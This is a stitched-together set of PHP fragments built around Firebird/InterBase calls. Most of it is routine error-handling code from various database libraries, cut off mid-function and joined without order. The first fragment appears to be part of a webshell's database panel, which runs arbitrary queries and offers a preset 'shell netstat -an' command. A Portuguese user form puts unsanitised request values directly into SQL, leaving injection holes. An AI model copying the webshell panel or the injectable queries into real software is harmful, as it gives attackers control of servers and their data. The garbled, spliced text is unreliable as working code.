\tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
\tStr[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
\tStr[3] = "input 'D:\\createtable.sql';";
\tStr[4] = "shell netstat -an;";
fbform.fbsql.value = Str[i];
return true;
}
</script>
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
<select onchange="return fbFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">����</option>
\t<option value="2">�ֶ�</option>
\t<option value="3">����sql</option>
\t<option value="4">shell</option>
</select>
<input type="hidden" name="action" value="fbquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($fbaction == 'fbquery') {
$fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg());
$fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg());
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
echo '<td><b>' . ibase_field_info($fbresult, $i) . "</b></td>\n";
}
echo "</tr>\n";
ibase_field_info($fbresult, 0);
while ($fbrow = ibase_fetch_row($fbresult)) {
echo "<tr>\n";
for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
echo '<td>' . "{$fbrow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
ibase_free_result($fbresult);
ibase_close();
}
}
}
/**
* Gather information about an error, then use that info to create a
* DB error object and finally return that object.
*
* @param integer $db_errno PEAR error number (usually a DB constant) if
* manually raising an error
* @param string $native_errmsg text of error message if known
* @return object DB error object
* @see DB_common::errorCode()
* @see DB_common::raiseError()
*/
function &ibaseRaiseError($db_errno = null, $native_errmsg = null)
{
if ($native_errmsg === null) {
$native_errmsg = @ibase_errmsg();
}
// memo for the interbase php module hackers: we need something similar
// to mysql_errno() to retrieve error codes instead of this ugly hack
if (preg_match('/^([^0-9\\-]+)([0-9\\-]+)\\s+(.*)$/', $native_errmsg, $m)) {
$native_errno = (int) $m[2];
} else {
$native_errno = null;
}
// try to map the native error to the DB one
if ($db_errno === null) {
if ($native_errno) {
// try to interpret Interbase error code (that's why we need ibase_errno()
// in the interbase module to return the real error code)
switch ($native_errno) {
case -204:
if (is_int(strpos($m[3], 'Table unknown'))) {
$db_errno = DB_ERROR_NOSUCHTABLE;
}
break;
default:
$db_errno = $this->errorCode($native_errno);
}
} else {
$error_regexps = array('/[tT]able not found/' => DB_ERROR_NOSUCHTABLE, '/[tT]able .* already exists/' => DB_ERROR_ALREADY_EXISTS, '/validation error for column .* value "\\*\\*\\* null/' => DB_ERROR_CONSTRAINT_NOT_NULL, '/violation of [\\w ]+ constraint/' => DB_ERROR_CONSTRAINT, '/conversion error from string/' => DB_ERROR_INVALID_NUMBER, '/no permission for/' => DB_ERROR_ACCESS_VIOLATION, '/arithmetic exception, numeric overflow, or string truncation/' => DB_ERROR_DIVZERO);
foreach ($error_regexps as $regexp => $code) {
if (preg_match($regexp, $native_errmsg)) {
$db_errno = $code;
$native_errno = null;
break;
}
}
}
}
$tmp =& $this->raiseError($db_errno, null, null, null, $native_errmsg);
return $tmp;
}
/**
+----------------------------------------------------------
* 数据库错误信息
* 并显示当前的SQL语句
+----------------------------------------------------------
* @access public
+----------------------------------------------------------
* @return string
+----------------------------------------------------------
* @throws ThinkExecption
+----------------------------------------------------------
*/
public function error()
{
$this->error = ibase_errmsg();
if ('' != $this->queryStr) {
$this->error .= "\n [ SQL语句 ] : " . $this->queryStr;
}
Log::record($this->error, Log::ERR);
return $this->error;
}
function gcms_error()
{
return ibase_errmsg();
}
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
$dados = array('nome' => '', 'email' => '', 'senha' => '');
if ('post' == strtolower($_SERVER['REQUEST_METHOD'])) {
$dados = array('nome' => filter_var($_POST['nome'], FILTER_SANITIZE_STRING), 'email' => filter_var($_POST['email'], FILTER_SANITIZE_EMAIL), 'senha' => empty($_POST['senha']) ? $usuario_logado->SENHA : sha1(md5($_POST['senha'])));
$sql = "INSERT INTO usuarios(id, nome, email, senha) VALUES ((SELECT iif(MAX(id) > 0, MAX(id), 0) FROM usuarios) + 1, '{$dados['nome']}', '{$dados['email']}', '{$dados['senha']}') RETURNING id";
if ($rotas['id']) {
$sql = "UPDATE usuarios SET nome = '{$dados['nome']}', email = '{$dados['email']}', senha = '{$dados['senha']}' WHERE id = '{$usuario_logado->ID}' RETURNING id";
}
$query = ibase_query($conexao, $sql);
$resultado = ibase_fetch_object($query);
if ($resultado) {
header("Location: {$base}/index.php/{$rotas['pagina']}/formulario/{$resultado->ID}");
}
echo 'Houve um erro ao salvar os dados. Tente novamente.<br/>' . ibase_errmsg();
}
if ($rotas['id']) {
$sql = "SELECT * FROM usuarios WHERE id = '{$rotas['id']}'";
$query = ibase_query($conexao, $sql);
$dados = ibase_fetch_assoc($query);
$dados = array_change_key_case($dados, CASE_LOWER);
}
?>
<h2><?php
echo $rotas['id'] ? 'Editar' : 'Criar novo';
?>
usuario</h2>
<form action="" method="post">
<label>Nome</label><br/>
<input required name="nome" value="<?php
/**
* Maps native error codes to DB's portable ones
*
* @param int $nativecode the error code returned by the DBMS
*
* @return int the portable DB error code. Return DB_ERROR if the
* current driver doesn't have a mapping for the
* $nativecode submitted.
*
* @since Method available since Release 1.7.0
*/
function errorCode($nativecode = null)
{
if (isset($this->errorcode_map[$nativecode])) {
return $this->errorcode_map[$nativecode];
}
static $error_regexps;
if (!isset($error_regexps)) {
$error_regexps = array('/generator .* is not defined/' => DB_ERROR_SYNTAX, '/violation of [\\w ]+ constraint/i' => DB_ERROR_CONSTRAINT, '/table.*(not exist|not found|unknown)/i' => DB_ERROR_NOSUCHTABLE, '/table .* already exists/i' => DB_ERROR_ALREADY_EXISTS, '/unsuccessful metadata update .* failed attempt to store duplicate value/i' => DB_ERROR_ALREADY_EXISTS, '/unsuccessful metadata update .* not found/i' => DB_ERROR_NOT_FOUND, '/validation error for column .* value "\\*\\*\\* null/i' => DB_ERROR_CONSTRAINT_NOT_NULL, '/conversion error from string/i' => DB_ERROR_INVALID_NUMBER, '/no permission for/i' => DB_ERROR_ACCESS_VIOLATION, '/arithmetic exception, numeric overflow, or string truncation/i' => DB_ERROR_INVALID, '/feature is not supported/i' => DB_ERROR_NOT_CAPABLE);
}
$errormsg = @ibase_errmsg();
foreach ($error_regexps as $regexp => $code) {
if (preg_match($regexp, $errormsg)) {
return $code;
}
}
return DB_ERROR;
}
function sql_error($sql = '')
{
if (!$this->return_on_error) {
$this_page = !empty($_SERVER['PHP_SELF']) ? $_SERVER['PHP_SELF'] : $_ENV['PHP_SELF'];
$this_page .= '&' . (!empty($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : $_ENV['QUERY_STRING']);
$message = '<u>SQL ERROR</u> [ ' . SQL_LAYER . ' ]<br /><br />' . @ibase_errmsg() . '<br /><br /><u>CALLING PAGE</u><br /><br />' . $this_page . ($sql != '' ? '<br /><br /><u>SQL</u><br /><br />' . $sql : '') . '<br />';
if ($this->transaction) {
$this->sql_transaction('rollback');
}
trigger_error($message, E_USER_ERROR);
}
$result['message'] = @ibase_errmsg();
$result['code'] = '';
return $result;
}
/**
* Gets the latest database error message.
*
* @return string The text of the last database error. (The type of
* information varies depending on the which type of database
* is being used.)
*/
function dbi_error()
{
if (strcmp($GLOBALS["db_type"], "mysql") == 0) {
$ret = mysql_error();
} else {
if (strcmp($GLOBALS["db_type"], "mysqli") == 0) {
$ret = mysqli_error($GLOBALS["db_connection"]);
} else {
if (strcmp($GLOBALS["db_type"], "mssql") == 0) {
// no real mssql_error function. this is as good as it gets
$ret = mssql_get_last_message();
} else {
if (strcmp($GLOBALS["db_type"], "oracle") == 0) {
$ret = OCIError($GLOBALS["oracle_connection"]);
} else {
if (strcmp($GLOBALS["db_type"], "postgresql") == 0) {
$ret = pg_errormessage($GLOBALS["postgresql_connection"]);
} else {
if (strcmp($GLOBALS["db_type"], "odbc") == 0) {
// no way to get error from ODBC API
$ret = "Unknown ODBC error";
} else {
if (strcmp($GLOBALS["db_type"], "ibm_db2") == 0) {
$ret = db2_conn_errormsg();
if ($ret == '') {
$ret = db2_stmt_errormsg();
}
} else {
if (strcmp($GLOBALS["db_type"], "ibase") == 0) {
$ret = ibase_errmsg();
} else {
$ret = "dbi_error(): db_type not defined.";
}
}
}
}
}
}
}
}
if (strlen($ret)) {
return $ret;
} else {
return "Unknown error";
}
}
/**
* Returns a formatted error message from previous database operation.
*
* @return string Error message with error number
*/
function lastError()
{
$error = ibase_errmsg();
if ($error !== false) {
return $error;
}
return null;
}
